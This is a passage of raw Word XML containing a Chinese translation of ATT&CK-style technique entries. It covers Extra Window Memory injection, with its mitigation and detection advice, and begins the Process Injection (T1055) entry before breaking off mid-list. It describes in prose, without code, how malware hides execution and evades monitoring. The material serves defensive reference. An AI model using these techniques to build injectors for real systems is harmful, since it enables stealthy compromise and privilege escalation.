        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>的图形进程必须规定或注册一个窗口类，该类规定外观和行为（通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>过程，这是处理数据输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>输出的函数）。新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>类的注册可以包括请求将最多</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> 40 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>字节的额外窗口内存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>EWM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>追加到该类的每个实例的分配内存中。此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> EWM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>用于存储特定于该窗口的数据，并且具有特定的应用程序编程接口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>函数来设置和获取其值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E96F6E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE30B2">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">EWM </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE30B2">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虽然很小，但足够存储</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE30B2">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 32 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE30B2">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位指针，通常用于指向窗口过程。</w:t>
      </w:r>
      <w:r w:rsidRPr="00057D2F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意软件可能在攻击链的一部分中利用此内存位置，包括将代码写入进程内存的共享部分，在</w:t>
      </w:r>
      <w:r w:rsidRPr="00057D2F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>EWM</w:t>
      </w:r>
      <w:r w:rsidRPr="00057D2F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中放置指向代码的指针，然后通过将执行控制返回到进程的</w:t>
      </w:r>
      <w:r w:rsidRPr="00057D2F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>EWM</w:t>
      </w:r>
      <w:r w:rsidRPr="00057D2F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的地址来调用执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0164CA12" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> EWM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>注入授予的执行可能在单独的实时进程的地址空间中进行。与</w:t>
      </w:r>
      <w:r w:rsidRPr="00057D2F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>进程注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>类似，这可以允许访问目标进程的内存和可能提升的权限。将有效负载写入共享部分还避免使用高度监视的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>调用，如写入过程内存和创建远程线程。</w:t>
      </w:r>
      <w:r w:rsidRPr="00057D2F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更复杂的恶意软件样本还可能通过触发窗口过程和其他系统功能的组合来绕过保护机制，例如数据执行保护（</w:t>
      </w:r>
      <w:r w:rsidRPr="00057D2F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DEP</w:t>
      </w:r>
      <w:r w:rsidRPr="00057D2F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），这些功能将重写目标进程的可执行部分内的恶意负载。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A8D8BA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="728F1649" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7656D521" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00057D2F" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00057D2F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>这种类型的攻击技术无法通过预防性控制轻松缓解，因为它基于系统功能的滥用</w:t>
      </w:r>
      <w:r w:rsidRPr="00057D2F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3B5D14" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6EBF7B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>监控与枚举和操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> EWM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>相关的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>调用，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> GetWindowLong </w:t>
      </w:r>
      <w:hyperlink r:id="rId95" w:tgtFrame="_blank" w:history="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> SetWindowLong </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:hyperlink r:id="rId96" w:tgtFrame="_blank" w:history="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>与此技术关联的恶意软件还使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> SendNotifyMessage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId97" w:tgtFrame="_blank" w:history="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>来触发关联的窗口过程和最终的恶意注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB484DD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="5B3307BF" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B59C816" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1055</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E5DB780" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>防御逃逸，权限升级</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C559C97" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B6526B3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：用户，管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>系统，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>root</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="428A4C56" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>有效权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>用户，管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>系统，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>root</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E9F58A2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>注册表，文件监控，动态链接库监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>命名</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>管道</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52180D13" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>进程白名单，防病毒</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FBA8404" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId98" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00671A0D">
                <w:t>CAPEC-242</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00671A0D">
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31677FCC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Anastasios Pingios</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Christiaan Beek</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>@ChristiaanBeek</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Ryan Becwar</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A9E6FC7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4FBD1E26" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="253A89FF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>进程注入是在单独的活动进程的地址空间中执行任意代码的方法。在另一个进程的上下文中运行代码可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>导致</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许访问该进程的内存、系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络资源以及可能导致权限</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>提升</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。通过进程注入执行代码还可以逃避安全产品的检测，因为代码执行是用合法进程隐藏的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CCCE95" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391E06E4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将代码注入活动的进程有多种实现方法。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>中有如下</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFB2DB9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B245BB" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动态链接库注入涉及将恶意动态链接库路径写入进程内，然后通过创建远程线程来调用执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7215E453" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B245BB" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可移植可执行注入涉及将恶意代码直接写入进程（磁盘上没有文件），然后通过这些</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:t>额外代码或创建远程</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>线程来</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:t>调用执行。</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用注入的代码来置换</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:t>原有的代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引入了其他功能</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:t>需求：</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
